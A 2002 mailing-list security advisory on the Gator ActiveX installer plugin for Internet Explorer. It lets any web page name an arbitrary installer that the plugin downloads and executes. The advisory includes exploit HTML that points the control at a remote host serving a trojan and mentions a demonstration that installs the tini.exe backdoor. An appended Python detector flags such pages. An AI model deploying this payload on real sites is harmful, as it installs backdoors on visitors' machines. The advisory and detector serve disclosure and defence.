Gator installer Plugin allows any software to be installed

From: obscure (obscureat_private)
Date: Wed Feb 20 2002 - 14:30:19 PST


    Advisory Title: Gator installer Plugin allows any software to be installed
    Release Date: 21/01/2002
    
    Application: Gator installer plugin for Internet Explorer (GAIN)
    
    Platform: Windows clients with Internet Explorer.
    
    DLL version - 3.0.6.1
    
    Severity: Malicious users can install backdoor software and
    gain easy access to the target machine.
    
    Author:
    Obscure^
    [ obscureat_private ]
    
    Vendor Status:
    Not informed.
    
    Web:
    
    http://www.gator.com
    http://eyeonsecurity.net/advisories/gatorieplugin.html
    
    
    Background.
    
    (extracted from http://gator.com)
    
    Features:
    Fills in FORMS without typing!
    Remembers PASSWORDS automatically
    Protects and encrypts your data on YOUR computer
    Gator comes bundled .. etc
    
    The vulnerability exists in a plugin which installs the actual
    software. This plugin is scriptable and allows an HTML page to
    specify the location of the Gator installation. This ActiveX
    component is usually installed from this page:
    http://www.gator.com/download/msie.html
    
    Problem.
    
    The issue here is that any HTML page can specify the location
    of the Gator installation file. The installation file is
    downloaded, then its filename is checked. If the filename is
    setup.ex_, it is then decompressed and executed. If the file is
    not compressed, it is still executed. Using this method, a
    malicious user can easily create an HTML page which makes use of
    the rogue ActiveX component to point at a trojan file.
    
    
    
    Exploit Example.
    
    <xbject
             id="IEGator"
             classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C"
             codebase="http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab"
             align="baseline"
             border="0"
             width="400"
             height="20">
    <pxram name="params"
    value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0&aic=",aicStr,"&">
    </xbject>
    
    I set up a small demonstration which installs tini.exe
    (which is a trojan listening on port 7777).
    If you need any information about tini.exe check out
    http://www.ntsecurity.nu/toolbox/tini/.
    The exploit example is found at:
    http://eyeonsecurity.net/advisories/gatorexploit
    
    Fix.
    
    Simply delete the ActiveX component from
    %windir%\Downloaded Program Files .. I think that should fix it.
    
    
    Disclaimer.
    
    The information within this document may change without notice. Use of
    this information constitutes acceptance for use in an AS IS
    condition. There are NO warranties with regard to this information.
    In no event shall the author be liable for any consequences whatsoever
    arising out of or in connection with the use or spread of this
    information. Any use of this information lies within the user's
    responsibility.
    
    
    Feedback.
    
    Please send suggestions, updates, and comments to:
    
    Eye on Security
    mail : obscureat_private
    web : http://www.eyeonsecurity.net
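
Added example (not part of the original advisory, and not the author's or Gator's code): a content-filter style check in Python that flags HTML which instantiates the control's CLSID with an installer src outside the vendor's domain. Treating gator.com as the only legitimate origin is an assumption, as are the function names and the sample hosts.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

GATOR_CLSID = "29EEFF42-F3FA-11D5-A9D5-00500413153C"  # CLSID given in the advisory
VENDOR_DOMAIN = "gator.com"  # assumption: the only legitimate installer origin

def is_vendor_host(src):
    # The advisory's src value has no scheme, so add one before parsing.
    url = src if "//" in src else "http://" + src
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    return host == VENDOR_DOMAIN or host.endswith("." + VENDOR_DOMAIN)

class GatorObjectScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_gator = False  # True while inside an <object> for the control
        self.findings = []     # (src, off_vendor) for every src parameter seen

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            classid = a.get("classid", "").upper().replace("CLSID:", "").strip("{} ")
            self.in_gator = classid == GATOR_CLSID
        elif tag == "param" and self.in_gator and a.get("name", "").lower() == "params":
            for src in parse_qs(a.get("value", "")).get("src", []):
                self.findings.append((src, not is_vendor_host(src)))

    def handle_endtag(self, tag):
        if tag == "object":
            self.in_gator = False

def scan(html):
    scanner = GatorObjectScanner()
    scanner.feed(html)
    return scanner.findings

# Constructed sample page; hosts and paths are placeholders, not from the advisory.
SAMPLE = """
<object id="IEGator" classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C">
<param name="params" value="fcn=setup&src=files.example.net/x/setup.ex_&bgcolor=F0F1D0">
</object>
<object classid="clsid:29eeff42-f3fa-11d5-a9d5-00500413153c">
<param name="params" value="fcn=setup&src=www.gator.com/download/setup.ex_">
</object>
"""

if __name__ == "__main__":
    for src, off_vendor in scan(SAMPLE):
        print("ALERT" if off_vendor else "ok   ", src)
```

The host comparison is done on the parsed hostname, so look-alike values such as a vendor name used as a subdomain prefix or as URL userinfo are still reported as off-vendor.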
    



    This archive was generated by hypermail 2b30 : Fri Feb 22 2002 - 06:36:14 PST